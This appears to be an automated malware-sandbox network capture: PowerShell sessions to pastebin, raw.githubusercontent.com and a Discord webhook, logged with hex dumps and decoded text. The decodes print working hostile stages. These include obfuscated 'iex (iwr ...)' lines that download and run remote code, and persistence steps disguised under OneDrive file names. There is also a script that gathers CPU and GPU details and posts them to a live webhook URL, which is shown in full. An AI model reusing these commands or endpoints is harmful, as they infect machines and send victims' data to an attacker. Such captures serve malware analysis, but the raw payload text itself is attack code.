                                                              2024-10-15 14:01:01 UTC198INData Raw: 74 70 75 74 20 22 46 61 69 6c 65 64 20 74 6f 20 73 65 6e 64 20 6d 65 73 73 61 67 65 2e 20 45 72 72 6f 72 3a 20 24 5f 22 0a 7d 0a 23 73 74 61 72 74 20 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 69 6e 64 6f 77 73 74 79 6c 65 20 68 20 2d 61 72 67 73 20 27 69 65 78 20 28 69 77 72 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 4e 65 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 5f 70 79 6c 64 2e 74 78 74 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 27 0a 0a 7d 0a
                                                              Data Ascii: tput "Failed to send message. Error: $_"}#start powershell -windowstyle h -args 'iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)'}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.949856104.20.3.2354437328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 14:01:19 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: pastebin.com
                                                              Connection: Keep-Alive
                                                              2024-10-15 14:01:19 UTC397INHTTP/1.1 200 OK
                                                              Date: Tue, 15 Oct 2024 14:01:19 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-frame-options: DENY
                                                              x-content-type-options: nosniff
                                                              x-xss-protection: 1;mode=block
                                                              cache-control: public, max-age=1801
                                                              CF-Cache-Status: HIT
                                                              Age: 529
                                                              Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                              Server: cloudflare
                                                              CF-RAY: 8d30572769c66bdd-DFW
                                                              2024-10-15 14:01:19 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                              Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                              2024-10-15 14:01:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.949869185.199.108.1334437328C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 14:01:20 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: raw.githubusercontent.com
                                                              Connection: Keep-Alive
                                                              2024-10-15 14:01:20 UTC901INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 7508
                                                              Cache-Control: max-age=300
                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                              Content-Type: text/plain; charset=utf-8
                                                              ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                              Strict-Transport-Security: max-age=31536000
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: deny
                                                              X-XSS-Protection: 1; mode=block
                                                              X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                              Accept-Ranges: bytes
                                                              Date: Tue, 15 Oct 2024 14:01:20 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-dfw-kdfw8210026-DFW
                                                              X-Cache: HIT
                                                              X-Cache-Hits: 1
                                                              X-Timer: S1729000881.679485,VS0,VE1
                                                              Vary: Authorization,Accept-Encoding,Origin
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              X-Fastly-Request-ID: 8fc5609c245b2e1f44f5c6d8e40c353a4aae14e2
                                                              Expires: Tue, 15 Oct 2024 14:06:20 GMT
                                                              Source-Age: 86
                                                              2024-10-15 14:01:20 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                              Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                              2024-10-15 14:01:20 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                              Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                              2024-10-15 14:01:20 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                              Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                              2024-10-15 14:01:20 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                              Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                              2024-10-15 14:01:20 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                              Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                              2024-10-15 14:01:20 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                              Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.949868162.159.137.2324437736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 14:01:20 UTC311OUTPOST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Content-Type: application/json
                                                              Host: discord.com
                                                              Content-Length: 215
                                                              Connection: Keep-Alive
                                                              2024-10-15 14:01:20 UTC215OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 74 69 6e 61 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 63 72 7a 63 72 70 74 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 4d 57 43 34 59 41 4e 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                              Data Ascii: { "content": "**user** has joined - crzcrpt\n----------------------------------\n**GPU:** MWC4YAN\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                              2024-10-15 14:01:20 UTC1253INHTTP/1.1 404 Not Found
                                                              Date: Tue, 15 Oct 2024 14:01:20 GMT
                                                              Content-Type: application/json
                                                              Content-Length: 45
                                                              Connection: close
                                                              Cache-Control: public, max-age=3600, s-maxage=3600
                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                              x-ratelimit-limit: 5
                                                              x-ratelimit-remaining: 4
                                                              x-ratelimit-reset: 1729000882
                                                              x-ratelimit-reset-after: 1
                                                              via: 1.1 google
                                                              alt-svc: h3=":443"; ma=86400
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=58B81X6XqTUALdaBPuB4CfjF62tBh2T0Sr80DNIqWF0vD33om5w65U%2B1ZoHFRUyaIQLxuxnEnHXXFUzgKDsk3wi%2FcXAmwm483Ymcd3W5z8wNY0GD4JvymBTg3vnt"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              X-Content-Type-Options: nosniff
                                                              Set-Cookie: __cfruid=c2021c9f6a79cf8578cacfe5f6ac2dc95557f6e5-1729000880; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                              Set-Cookie: _cfuvid=F0CDxSPHlGiABYxlu8vUvaOxRpKPK93DuSrUk_klzrI-1729000880780-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                              Server: cloudflare
                                                              CF-RAY: 8d3057304f4d143f-DFW
                                                              2024-10-15 14:01:20 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                              Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.949905104.20.3.2354437368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 14:01:27 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: pastebin.com
                                                              Connection: Keep-Alive
                                                              2024-10-15 14:01:27 UTC397INHTTP/1.1 200 OK
                                                              Date: Tue, 15 Oct 2024 14:01:27 GMT
                                                              Content-Type: text/plain; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              x-frame-options: DENY
                                                              x-content-type-options: nosniff
                                                              x-xss-protection: 1;mode=block
                                                              cache-control: public, max-age=1801
                                                              CF-Cache-Status: HIT
                                                              Age: 537
                                                              Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                              Server: cloudflare
                                                              CF-RAY: 8d305759fd1bc86f-DFW
                                                              2024-10-15 14:01:27 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                              Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                              2024-10-15 14:01:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.949916185.199.108.1334437368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-10-15 14:01:28 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: raw.githubusercontent.com
                                                              Connection: Keep-Alive
                                                              2024-10-15 14:01:28 UTC901INHTTP/1.1 200 OK
                                                              Connection: close
                                                              Content-Length: 7508
                                                              Cache-Control: max-age=300
                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                              Content-Type: text/plain; charset=utf-8
                                                              ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                              Strict-Transport-Security: max-age=31536000
                                                              X-Content-Type-Options: nosniff
                                                              X-Frame-Options: deny
                                                              X-XSS-Protection: 1; mode=block
                                                              X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                              Accept-Ranges: bytes
                                                              Date: Tue, 15 Oct 2024 14:01:28 GMT
                                                              Via: 1.1 varnish
                                                              X-Served-By: cache-dfw-kdal2120056-DFW
                                                              X-Cache: HIT
                                                              X-Cache-Hits: 1
                                                              X-Timer: S1729000889.842877,VS0,VE1
                                                              Vary: Authorization,Accept-Encoding,Origin
                                                              Access-Control-Allow-Origin: *
                                                              Cross-Origin-Resource-Policy: cross-origin
                                                              X-Fastly-Request-ID: a776deeb177edc88db18d1785fe1588bdc20d2ec
                                                              Expires: Tue, 15 Oct 2024 14:06:28 GMT
                                                              Source-Age: 94
                                                              2024-10-15 14:01:28 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                              Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                              2024-10-15 14:01:28 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                              Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                              2024-10-15 14:01:28 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                              Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                              2024-10-15 14:01:28 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                              Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
